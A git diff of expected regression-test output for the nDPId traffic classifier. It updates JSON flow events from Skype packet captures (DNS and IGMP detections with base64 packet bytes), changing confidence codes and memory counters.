00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","packets-captured":3284,"packets-processed":3069,"total-skipped-flows":0,"total-l4-payload-len":444195,"total-not-detected-flows":61,"total-guessed-flows":28,"total-detected-flows":204,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":293,"total-idle-flows":293,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1467,"global_ts_msec":1431969808951} @@ -1473,9 +1473,9 @@ ~~ total active/idle flows...: 293/293 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6604366 bytes -~~ total memory freed........: 6604366 bytes -~~ total allocations/frees...: 122503/122503 +~~ total memory allocated....: 6607300 bytes +~~ total memory freed........: 6607300 bytes +~~ total allocations/frees...: 125218/125218 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 444 chars ~~ json string max len.......: 1773 chars diff --git a/test/results/skype_no_unknown.pcap.out b/test/results/skype_no_unknown.pcap.out index fa6c0a62f..a2998c305 100644 --- a/test/results/skype_no_unknown.pcap.out +++ b/test/results/skype_no_unknown.pcap.out 
@@ -2,72 +2,72 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skype_no_unknown.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431970631778} 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431970632290,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1431970632290,"pkt":"AQBeAAAWJKQ8\/kzXCABGwAAoAABAAAECQXbAqAHb4AAAFpQEAAAiADajAAAAAQIAAADpWbwBAAAAAAAA"} 
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431970634276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634276,"pkt":"0NQSxnP1PBXCt3IOCABFAABAj1gAAEARZ+HAqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431970634276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634276,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlRoAAEARYh\/AqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1431970634431,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970634431,"pkt":"0NQSxnP1PBXCt3IOCABFAABDXEcAAEARmu\/AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1431970634432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970634432,"pkt":"0NQSxnP1PBXCt3IOCABFAABDrh8AAEARSRfAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1431970634589,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970634589,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7UlwAAEARpOLAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1431970634591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970634591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA75y8AAEAREA\/AqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431970634648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1431970634648,"pkt":"0NQSxnP1PBXCt3IOCABFAABCEa4AAEAR5YnAqAEiwKgBAe5YADUALntuuqkBAAABAAAAAAAABGFwcHMLc2t5cGVhc3NldHMDY29tAAABAAE="} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"apps.skypeassets.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"apps.skypeassets.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431970634669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431970634669,"pkt":"0NQSxnP1PBXCt3IOCABFAABXFu0AAEAR4DXAqAEiwKgBAeFeADUAQ\/HxjTUBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 